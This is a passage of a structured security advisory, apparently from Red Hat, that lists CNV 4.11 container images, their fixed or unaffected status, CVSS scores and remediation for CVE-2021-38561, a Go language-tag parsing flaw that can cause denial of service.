"8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64", }, product_reference: "container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64", relates_to_product_reference: "8Base-CNV-4.11", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64 as a component of CNV 4.11 for RHEL 8", product_id: "8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", }, product_reference: "container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", relates_to_product_reference: "8Base-CNV-4.11", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64 as a component of CNV 4.11 for RHEL 8", product_id: "8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64", }, product_reference: "container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64", relates_to_product_reference: "8Base-CNV-4.11", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64 as a component of CNV 4.11 for RHEL 8", product_id: "8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64", }, product_reference: "container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64", relates_to_product_reference: "8Base-CNV-4.11", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64 as a component of CNV 4.11 for RHEL 8", product_id: "8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64", }, product_reference: "container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64", relates_to_product_reference: "8Base-CNV-4.11", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64 as a component of CNV 4.11 for RHEL 8", product_id: "8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64", }, product_reference: "container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64", relates_to_product_reference: "8Base-CNV-4.11", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64 as a component of CNV 4.11 for RHEL 8", product_id: "8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64", }, product_reference: "container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64", relates_to_product_reference: "8Base-CNV-4.11", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64 as a component of CNV 4.11 for RHEL 8", product_id: "8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64", }, product_reference: "container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64", relates_to_product_reference: "8Base-CNV-4.11", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64 as a component of CNV 4.11 for RHEL 8", product_id: "8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64", }, product_reference: "container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64", relates_to_product_reference: "8Base-CNV-4.11", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64 as a component of CNV 4.11 for RHEL 8", product_id: "8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64", }, product_reference: "container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64", relates_to_product_reference: "8Base-CNV-4.11", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64 as a component of CNV 4.11 for RHEL 8", product_id: "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64", }, product_reference: "container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64", relates_to_product_reference: "8Base-CNV-4.11", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64 as a component of CNV 4.11 for RHEL 8", product_id: "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64", }, product_reference: "container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64", relates_to_product_reference: "8Base-CNV-4.11", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64 as a component of CNV 4.11 for RHEL 8", product_id: "8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64", }, product_reference: "container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64", relates_to_product_reference: "8Base-CNV-4.11", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64 as a component of CNV 4.11 for RHEL 8", product_id: "8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64", }, product_reference: "container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64", relates_to_product_reference: "8Base-CNV-4.11", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64 as a component of CNV 4.11 for RHEL 8", product_id: "8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64", }, product_reference: "container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64", relates_to_product_reference: "8Base-CNV-4.11", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64 as a component of CNV 4.11 for RHEL 8", product_id: "8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64", }, product_reference: "container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64", relates_to_product_reference: "8Base-CNV-4.11", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64 as a component of CNV 4.11 for RHEL 8", product_id: "8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64", }, product_reference: "container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64", relates_to_product_reference: "8Base-CNV-4.11", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64 as a component of CNV 4.11 for RHEL 8", product_id: "8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64", }, product_reference: "container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64", relates_to_product_reference: "8Base-CNV-4.11", }, ], }, vulnerabilities: [ { cve: "CVE-2021-38561", cwe: { id: "CWE-125", name: "Out-of-bounds Read", }, discovery_date: "2022-06-23T00:00:00+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", "8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64", "8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64", "8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", "8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64", "8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64", "8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64", "8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2100495", }, ], notes: [ { category: "description", text: "A flaw was found in golang. The language package for go language can panic due to an out-of-bounds read when an incorrectly formatted language tag is being parsed. This flaw allows an attacker to cause applications using this package to parse untrusted input data to crash, leading to a denial of service of the affected component.", title: "Vulnerability description", }, { category: "summary", text: "golang: out-of-bounds read in golang.org/x/text/language leads to DoS", title: "Vulnerability summary", }, { category: "other", text: "This flaw may be triggered only by accepting untrusted user input to the vulnerable golang's library. The overall DoS attack vector depends directly on how the library's input is exposed by the consuming application, thus Red Hat rates impact as Moderate.\n\nIn Red Hat Advanced Cluster Management for Kubernetes (RHACM) 2.5 version, the registration-operator, lighthouse-coredns, lighthouse-agent, gatekeeper-operator, and discovery-operator components are affected by this flaw, but the rest of the components are using an already patched version and are unaffected. For 2.4 and previous versions of Red Hat Advanced Cluster Management for Kubernetes (RHACM), most of the components are affected.", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64", ], known_not_affected: [ "8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", "8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64", "8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64", "8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", "8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64", "8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64", "8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64", "8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2021-38561", }, { category: "external", summary: "RHBZ#2100495", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2100495", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2021-38561", url: "https://www.cve.org/CVERecord?id=CVE-2021-38561", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2021-38561", url: "https://nvd.nist.gov/vuln/detail/CVE-2021-38561", }, { category: "external", summary: "https://pkg.go.dev/vuln/GO-2021-0113", url: "https://pkg.go.dev/vuln/GO-2021-0113", }, ], release_date: "2021-08-12T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2022-09-14T19:28:51+00:00", details: "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2022:6526", }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 7.5, baseSeverity: "HIGH", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", version: "3.1", }, products: [ "8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", "8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64", "8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64", "8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64", 